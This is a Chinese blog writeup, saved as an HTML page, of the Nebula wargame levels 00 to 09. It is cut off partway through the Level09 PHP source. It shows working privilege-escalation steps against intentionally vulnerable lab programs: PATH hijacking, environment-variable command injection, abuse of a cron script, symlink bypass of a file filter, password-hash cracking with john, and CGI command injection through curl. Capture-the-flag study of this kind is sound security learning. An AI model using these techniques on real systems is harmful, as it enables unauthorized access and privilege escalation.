<!DOCTYPE html>
<html lang="default">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <title>Nebula Writeup | Hc1m1</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="这份writeup可能水分很大，因为第一次玩这类的题目，所以一边看别人的writeup一边玩才玩的出来，不过还会有自己的总结。">
<meta name="keywords" content="bin">
<meta property="og:type" content="article">
<meta property="og:title" content="Nebula Writeup">
<meta property="og:url" content="http://0x48.pw/2016/02/14/0x0F/index.html">
<meta property="og:site_name" content="Hc1m1">
<meta property="og:description" content="这份writeup可能水分很大，因为第一次玩这类的题目，所以一边看别人的writeup一边玩才玩的出来，不过还会有自己的总结。">
<meta property="og:image" content="http://7xscw6.com1.z0.glb.clouddn.com/hexo-tcpl.png">
<meta property="og:image" content="http://7xscw6.com1.z0.glb.clouddn.com/hexo-tcpl2.png">
<meta property="og:updated_time" content="2017-07-26T03:26:12.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Nebula Writeup">
<meta name="twitter:description" content="这份writeup可能水分很大，因为第一次玩这类的题目，所以一边看别人的writeup一边玩才玩的出来，不过还会有自己的总结。">
<meta name="twitter:image" content="http://7xscw6.com1.z0.glb.clouddn.com/hexo-tcpl.png">
  
    <link rel="alternative" href="/rss.xml" title="Hc1m1" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  
      <link href="//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css" rel="stylesheet">
  
  
      <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
      <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">
  
  <link rel="stylesheet" href="/css/style.css">
  
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
    <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <script src="//cdn.bootcss.com/jquery/1.9.1/jquery.min.js"></script>
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false,
      }
  </script>

  
      <script>
          yiliaConfig.rootUrl = "/";
      </script>
  

  
      <script>
          var _hmt = _hmt || [];
          (function() {
              var hm = document.createElement("script");
              hm.src = "//hm.baidu.com/hm.js?4b6b8b9a09d24f4d4e26c50bd1707fd7";
              var s = document.getElementsByTagName("script")[0]; 
              s.parentNode.insertBefore(hm, s);
          })();
      </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  
</head>
<body>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="http://qn.lazysheep.cc/img/author.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Hcamael</a></h1>
        </hgroup>

        
        <p class="header-subtitle">Blog</p>
        
                


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <li id="Email"><a class="Email" target="_blank" href="mailto: baiyjrh@gmail.com" title="Email"></a></li>
                            
                                <li id="GitHub"><a class="GitHub" target="_blank" href="https://github.com/Hcamael" title="GitHub"></a></li>
                            
                                <li id="RSS"><a class="RSS" target="_blank" href="/rss.xml" title="RSS"></a></li>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 16.67px;">Crypto</a> <a href="/tags/GIT/" style="font-size: 10px;">GIT</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/Pentest/" style="font-size: 10px;">Pentest</a> <a href="/tags/Python/" style="font-size: 13.33px;">Python</a> <a href="/tags/RE/" style="font-size: 11.67px;">RE</a> <a href="/tags/SQLi/" style="font-size: 11.67px;">SQLi</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/bin/" style="font-size: 18.33px;">bin</a> <a href="/tags/network/" style="font-size: 10px;">network</a> <a href="/tags/old-blog/" style="font-size: 10px;">old_blog</a> <a href="/tags/php/" style="font-size: 13.33px;">php</a> <a href="/tags/research/" style="font-size: 13.33px;">research</a> <a href="/tags/sb/" style="font-size: 10px;">sb</a> <a href="/tags/share/" style="font-size: 10px;">share</a> <a href="/tags/随笔/" style="font-size: 10px;">随笔</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://hduisa.cn">HDUISA</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://wiki.hduisa.org">wiki</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://drops.hduisa.org">Drops</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://lightless.me">lightless</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://homeway.me">夏日小草</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.edwardl.xyz">Edward_L</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://aklis.info">Aklis</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://libc.pw">Explorer</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://lorexxar.cn">Lorexxar</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">HDUISA, web狗, 菜鸡H, 正在向bin爷爷努力前进</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Hcamael</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="http://qn.lazysheep.cc/img/author.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Hcamael</a></h1>
            </hgroup>
            
            <p class="header-subtitle">Blog</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <li id="Email"><a class="Email" target="_blank" href="mailto: baiyjrh@gmail.com" title="Email"></a></li>
                            
                                <li id="GitHub"><a class="GitHub" target="_blank" href="https://github.com/Hcamael" title="GitHub"></a></li>
                            
                                <li id="RSS"><a class="RSS" target="_blank" href="/rss.xml" title="RSS"></a></li>
                            
                        </ul>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-0x0F" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/02/14/0x0F/" class="article-date">
      <time datetime="2016-02-14T02:16:46.000Z" itemprop="datePublished">2016-02-14</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Nebula Writeup
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/bin/">bin</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <blockquote>
<p>这份writeup可能水分很大，因为第一次玩这类的题目，所以一边看别人的writeup一边玩才玩的出来，不过还会有自己的总结。</p>
</blockquote>
<a id="more"></a>
<h1 id="附"><a href="#附" class="headerlink" title="附"></a>附</h1><p>这游戏一开始我是直接在虚拟机中玩，后面发现自己傻的可以，虚拟机中各种不方便，不能粘贴复制之类，没有鼠标etc。</p>
<p>后面发现，特么我只要设置下虚拟机的网络，就可以用本机shell，ssh连上去啊！</p>
<h1 id="Level00"><a href="#Level00" class="headerlink" title="Level00"></a>Level00</h1><p>第0题就是在告诉我们这系列的题目要怎么玩了，如何才算做出来。</p>
<p>其实就是分为两类用户，一个是levelxx和flagxx，xx就是题号，目的就是在levelxx用户的情况下，通过某些方法进入flagxx用户，然后执行getflag. 按目前的情况看，flagxx就是含漏洞的可执行文件。之后还有一些题是要求获取token，而token就是该题flag用户的密码。</p>
<p>第0题没啥技术性，就是用来告诉我们上面这些东西，<code>flag00</code> 的路径位 <code>/bin/.../flag00</code>, 直接执行就好:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">level00@nebula:/bin/...$ ./flag00</div><div class="line">Congrats, now run getflag to get your flag!</div><div class="line"></div><div class="line">flag00@nebula:/bin/...$ getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure>
<h1 id="Level01"><a href="#Level01" class="headerlink" title="Level01"></a>Level01</h1><p>第一题就感觉学到很多了，这题给了程序的源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">//flag01.c</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char **argv, char **envp)</div><div class="line">&#123;</div><div class="line">    gid_t gid;</div><div class="line">    uid_t uid;</div><div class="line"></div><div class="line">    gid = getegid();</div><div class="line">    uid = geteuid();</div><div class="line"></div><div class="line">    setresgid(gid, gid, gid);</div><div class="line">    setresuid(uid, uid, uid);</div><div class="line"></div><div class="line">    system(&quot;/usr/bin/env echo and now what?&quot;);</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>程序位于 <code>/home/flag01/flag01</code>, 我认为该题的关键点在于文件的s权限，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$ chmod 4750 flag01</div><div class="line">$ ll</div><div class="line">-rwsr-x--- flag01 level01       flag01</div></pre></td></tr></table></figure>
<p>uid, gid现在还不是了解的很清楚，以后再研究。</p>
<p>在没有设置s权限的情况下，运行flag01的uid和gid都为运行该程序用户的id，(可在/etc/passwd中查看)，但当设置了s权限之后，uid则变为该文件所属用户的uid，也就是说，任意用户(有权限)运行该文件，uid都为flag01的uid。</p>
<p>这有啥意义呢？ 该游戏的目的是使用levelxx用户通过flagxx程序get flagxx用户shell，运行getflag，该程序最后使用了system函数运行系统命令，因为设置了s权限，所以是以该文件所有者的身份运行命令，所以有两个思路，一个是直接运行getflag，另一个是运行<code>/bin/bash</code> get flag01用户的shell，这里我们用第二种方法。</p>
<p><code>$ /usr/bin/env echo</code> 是从左往右搜索 $PATH环境变量中的路径，寻找echo命令，则我们可以在环境变量的最左边添加一个路径，里面有一个我们自己写的echo命令:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">level01@neula:~$ PATH=/tmp:$PATH</div><div class="line">level01@neula:~$ vim /tmp/echo</div><div class="line">#!/bin/bash</div><div class="line">/bin/bash</div><div class="line">:wq</div><div class="line">level01@neula:~$ chmod +x /tmp/echo</div><div class="line">level01@neula:~$ cd /home/flag01</div><div class="line">level01@neula:~$ ./flag01</div><div class="line">flag01@neula:~$ getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure>
<h1 id="Level02"><a href="#Level02" class="headerlink" title="Level02"></a>Level02</h1><p>这题一样，源码审计：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">//flag02.c</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char **argv, char **envp)</div><div class="line">&#123;</div><div class="line">    char *buffer;</div><div class="line">    </div><div class="line">    gid_t gid;</div><div class="line">    uid_t uid;</div><div class="line"></div><div class="line">    gid = getegid();</div><div class="line">    uid = geteuid();</div><div class="line"></div><div class="line">    setresgid(gid, gid, gid);</div><div class="line">    setresuid(uid, uid, uid);</div><div class="line"></div><div class="line">    buffer = NULL;</div><div class="line">    </div><div class="line">    asprintf($buffer, &quot;/bin/echo %s is cool&quot;, getenv(&quot;USER&quot;));</div><div class="line">    printf(&quot;about to call system(\&quot;%s\&quot;)\n&quot;, buffer);</div><div class="line">    </div><div class="line">    system(buffer);</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>然后运行该程序试试<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">level02@nebula:/home/flag02$ ./flag02</div><div class="line">about to call system(&quot;/bin/echo level02 is cool&quot;)</div><div class="line">level02 is cool</div></pre></td></tr></table></figure></p>
<p>这题很简单，主要在 <code>getenv(&quot;USER&quot;)</code> 函数，该函数是获得shell的变量$USER<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">level02@nebula:~$ echo $USER</div><div class="line">level02</div></pre></td></tr></table></figure></p>
<p>所以只要更改该值，以达到我们能get flag02用户shell的目的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">level02@nebula:/home/flag02$ USER=&quot;;bash;&quot;</div><div class="line">level02@nebula:/home/flag02$ ./flag02</div><div class="line">about to call system(&quot;/bin/echo ;bash; is cool&quot;)</div><div class="line"></div><div class="line">flag02@nebula:/home/flag02$ getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure></p>
<h1 id="Level03"><a href="#Level03" class="headerlink" title="Level03"></a>Level03</h1><p>这题有个定时脚本，每隔几分钟运行一个：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">#!/bin/sh</div><div class="line"></div><div class="line">for i in /home/flag03/writable.d/* ; do</div><div class="line">    (ulimit -t 5; bash -x &quot;$i&quot;)</div><div class="line">    rm -f &quot;$i&quot;</div><div class="line">done</div></pre></td></tr></table></figure></p>
<p>这是一个 flag03用户运行的定时脚本，运行writable.d中的文件，运行结束后删除，不是很清楚这题的意义所在，/home/flag03/writable.d文件夹可写，那就写个脚本呗：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">level03@nebula:/home/flag03/writable.d$ vim getflag.sh</div><div class="line">#!/bin/bash</div><div class="line">getflag &gt; a.out</div><div class="line">:wq</div></pre></td></tr></table></figure></p>
<p>等会，你就会发现getflag.sh文件不见了，/home/flag03 下多出了a.out文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">level03@nebula:/home/flag03$ cat a.out</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure></p>
<p>恕我才疏学浅，这题并不懂该如何getshell，不过感觉这样和getshell没啥区别，想运行啥直接写脚本里就好了</p>
<h1 id="Level04"><a href="#Level04" class="headerlink" title="Level04"></a>Level04</h1><p>源码审计：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div></pre></td><td class="code"><pre><div class="line">//flag04.c</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;fcntl.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char **argv, char **envp)</div><div class="line">&#123;</div><div class="line">    char buf[1024];</div><div class="line">    int fd, rc;</div><div class="line">    </div><div class="line">    if (argc == 1)  &#123;</div><div class="line">        printf(&quot;%s [file to read]\n&quot;, argv[0]);</div><div class="line">        exit(EXIT_FAILURE);</div><div class="line">    &#125;  </div><div class="line">    </div><div class="line">    if (strstr((argv[1], &quot;token&quot;) != NULL) &#123;</div><div class="line">        printf(&quot;You may not access &apos;%s&apos;\n&quot;, argv[1]);</div><div class="line">        exit(EXIT_FAILURE);</div><div class="line">    &#125;</div><div class="line">    </div><div class="line">    fd = open(argv[1], O_RDONLY);</div><div class="line">    if (fd == -1) &#123;</div><div class="line">        err(EXIT_FAILURE, &quot;Unable to open %s&quot;, argv[1]);</div><div class="line">    &#125;</div><div class="line">    </div><div class="line">    rc = read(fd, buf, sizeof(buf));</div><div class="line">    </div><div class="line">    if (rc == -1) &#123;</div><div class="line">        err(EXIT_FAILURE, &quot;Unable to read fd %d&quot;, fd);</div><div class="line">    &#125;</div><div class="line">    </div><div class="line">    write(1, buf, rc);</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>这题的目的是读取/home/flag04/token文件，可是该文件对level04用户没有可读权限，然后通过flag04程序的限制读取token文件，flag04的源码如上。这里我陷入了一个误区了，以为对token文件啥权限都没有，所以注意里都放在代码上了，后面看了lightless的writeup才知道，没有权限的情况下仍然可以进行软链接。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">level04@nebula:~$ ln -s /home/flag04/token /tmp/fff</div><div class="line">level04@nebula:/home/flag04$ ./flag04 /tmp/fff</div><div class="line">06508b5e-8909-4f38-b630-fdb148a848a2</div></pre></td></tr></table></figure></p>
<h1 id="Level05"><a href="#Level05" class="headerlink" title="Level05"></a>Level05</h1><p>这题很简单，在 <code>/home/flag05</code> 目录下多出了 <code>.backup</code> 和 <code>.ssh</code> 目录，<code>.ssh</code> 目录没有可读权限，<code>.backup</code>里有个压缩文件，copy到自己的目录下解压。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz /home/level05</div><div class="line">level05@nebula:/home/flag05/.backup$ cd /home/level05</div><div class="line">level05@nebula:/home/level05$ tar zvxf backup-19072011.tgz</div></pre></td></tr></table></figure></p>
<p>解压出来了三个文件</p>
<ul>
<li>authorized_keys</li>
<li>id_rsa</li>
<li>id_rsa.pub<br>猜测这就是 <code>.ssh</code> 目录里的内容，所以可以直接ssh免密登录了<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">level05@nebula:~$ ssh flag05@127.0.0.1</div><div class="line">flag05@nebula:~$ getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure>
</li>
</ul>
<h1 id="Level06"><a href="#Level06" class="headerlink" title="Level06"></a>Level06</h1><p>这题涨姿势了，要我自己做，肯定是做不出来的，根据题目提示，到 <code>/home/flag06</code> 里去看，啥有用的也没发现，然后看了LL的wp后，才知道，重点是在 <code>/etc/password</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">flag06@nebula:~$ cat /etc/passwd|grep flag06</div><div class="line">flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh</div></pre></td></tr></table></figure>
<p>我猜测，这题的目的是让我们学如何破linux密码，但是<code>/etc/shadow</code> 普通用户不可读，所以把flag06在shadow的内容复制到passwd中</p>
<p>所以接下来就是破密码了, 使用 john命令，通过apt直接安装：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">$ apt-get install john</div><div class="line">......</div><div class="line">$ cat passwd</div><div class="line">flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh</div><div class="line">$ john passwd</div><div class="line">Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])</div><div class="line">Press &apos;q&apos; or Ctrl-C to abort, almost any other key for status</div><div class="line">hello            (flag06)</div><div class="line">1g 0:00:00:00 100% 2/3 2.631g/s 1981p/s 1981c/s 1981C/s 123456..marley</div><div class="line">Use the &quot;--show&quot; option to display all of the cracked passwords reliably</div><div class="line">Session completed</div></pre></td></tr></table></figure>
<p>密码：hello<br>然后ssh登录，getflag</p>
<h1 id="Level07"><a href="#Level07" class="headerlink" title="Level07"></a>Level07</h1><p>这题是perl的代码审计<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/perl</div><div class="line"></div><div class="line">use CGI qw&#123;param&#125;;</div><div class="line"></div><div class="line">print &quot;Content-type: text/html\n\n&quot;;</div><div class="line"></div><div class="line">sub ping &#123;</div><div class="line">  $host = $_[0];</div><div class="line"></div><div class="line">  print(&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;Ping results&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;pre&gt;&quot;);</div><div class="line"></div><div class="line">  @output = `ping -c 3 $host 2&gt;&amp;1`;</div><div class="line">  foreach $line (@output) &#123; print &quot;$line&quot;; &#125;</div><div class="line"></div><div class="line">  print(&quot;&lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;&quot;);</div><div class="line">  </div><div class="line">&#125;</div><div class="line"></div><div class="line"># check if Host set. if not, display normal page, etc</div><div class="line"></div><div class="line">ping(param(&quot;Host&quot;));</div></pre></td></tr></table></figure></p>
<p>虽然不懂Perl，但一看下就是$host没做任何过滤，所以可能会存在命令执行漏洞。这个脚本位于 <code>/home/flag07/index.cgi</code>, 然后通过 <code>thttpd.conf</code> 可知，这应该是使用http协议，监听了7007端口，然后接收Host参数，所以</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">$ curl  http://192.168.56.101:7007/index.cgi\?Host\=&quot;127.0.0||whoami;&quot; </div><div class="line">&lt;html&gt;&lt;head&gt;&lt;title&gt;Ping results&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;pre&gt;flag07</div><div class="line">&lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;</div><div class="line">$ curl  http://192.168.56.101:7007/index.cgi\?Host\=&quot;127.0.0||getflag;&quot;</div><div class="line">&lt;html&gt;&lt;head&gt;&lt;title&gt;Ping results&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;pre&gt;You have successfully executed getflag on a target account</div><div class="line">&lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;</div></pre></td></tr></table></figure>
<p>这是最简单的方法，因为这题的目的就是让我们getflag, 不过还可以进行提高，怎么getshell呢？去看LL菊苣的wp吧。。。。我没做出来。。thttpd一直报400错误。。</p>
<h1 id="Level08"><a href="#Level08" class="headerlink" title="Level08"></a>Level08</h1><p>这题是流量审计，在 <code>/home/flag08</code> 里面有一个pcap文件，拖到本地用Wireshark，然后发现全是TCP包，然后有些是包含一些不全的数据，这时候可以使用wireshark跟踪tcp流的功能</p>
<blockquote>
<p>右击任意一个TCP包，点击Follow TCP Stream<br><img src="http://7xscw6.com1.z0.glb.clouddn.com/hexo-tcpl.png" alt="tcpl"></p>
</blockquote>
<p>然后查看密码的十六进制<br><img src="http://7xscw6.com1.z0.glb.clouddn.com/hexo-tcpl2.png" alt="tcpl"></p>
<p>可知中间跟了几个0x7f(DEL)，所以密码是 <code>backd00Rmate</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$ ssh flag08@nebula</div><div class="line">flag08@nebula:~$ getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure>
<h1 id="Level09"><a href="#Level09" class="headerlink" title="Level09"></a>Level09</h1><p>这题是php代码审计:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line"></div><div class="line">function spam($email)</div><div class="line">&#123;</div><div class="line">  $email = preg_replace(&quot;/\./&quot;, &quot; dot &quot;, $email);</div><div class="line">  $email = preg_replace(&quot;/@/&quot;, &quot; AT &quot;, $email);</div><div class="line">  </div><div class="line">  return $email;</div><div class="line">&#125;</div><div class="line"></div><div class="line">function markup($filename, $use_me)</div><div class="line">&#123;</div><div class="line">  $contents = file_get_contents($filename);</div><div class="line"></div><div class="line">  $contents = preg_replace(&quot;/(\[email (.*)\])/e&quot;, &quot;spam(\&quot;\\2\&quot;)&quot;, $contents);</div><div class="line">  $contents = preg_replace(&quot;/\[/&quot;, &quot;&lt;&quot;, $contents);</div><div class="line">  $contents = preg_replace(&quot;/\]/&quot;, &quot;&gt;&quot;, $contents);</div><div class="line"></div><div class="line">  return $contents;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$output = markup($argv[1], $argv[2]);</div><div class="line"></div><div class="line">print $output;</div><div class="line"></div><div 